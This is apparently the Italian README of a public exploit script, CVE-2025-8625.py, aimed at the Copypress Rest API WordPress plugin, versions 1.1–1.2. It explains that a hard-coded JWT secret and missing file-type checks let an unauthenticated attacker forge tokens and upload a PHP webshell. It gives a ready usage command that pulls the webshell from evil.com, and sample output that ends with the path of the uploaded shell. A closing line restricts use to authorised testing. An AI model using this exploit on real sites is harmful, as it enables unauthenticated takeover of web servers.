
Copypress Rest API 1.1 - 1.2 - Mancanza di un segreto JWT configurabile e di validazione del tipo di file che consentono l'esecuzione remota di codice non autenticata
Copypress Rest API 1.1 - 1.2 - Segreto JWT configurabile mancante e validazione del tipo di file per l'esecuzione remota di codice non autenticata
Il plugin Copypress Rest API per WordPress (versioni 1.1 - 1.2) è vulnerabile all'Esecuzione Remota di Codice tramite la funzione copyreap_handle_image().
Il plugin utilizza una chiave di firma JWT hard-coded quando non è impostato alcun segreto e non valida i tipi di file, consentendo ad attaccanti non autenticati di forgiare token e caricare file arbitrari (come shell PHP) attraverso l'endpoint del gestore immagini.
Nome script: CVE-2025-8625.py
Questo script Python automatizza lo sfruttamento della vulnerabilità, consentendo di generare un JWT valido, inviare una richiesta craftata e caricare un file dannoso (webshell) sul sito WordPress vulnerabile.
python CVE-2025-8625.py -u https://target.com -shell https://evil.com/shell.php
-u / --url: URL del sito WordPress target-shell / --shell: Link diretto alla tua webshell o file PHP dannosoOutput di esempio:
JWT: eyJ0eXAiOiJKV1QiLCJhbGciOi...
HTTP 201: {"created":true,"id":123,"message":"Success"}
Exploit success! Check your shell upload.
Shell caricata con successo! 🎉
Esempio di percorso della shell:
https://target.com/wp-content/uploads/2025/10/shell.php
Questo strumento è destinato esclusivamente a test di penetrazione educativi e autorizzati.
L'utilizzo contro target senza esplicita autorizzazione è illegale.
Di: Nxploited (Khaled Alenazi)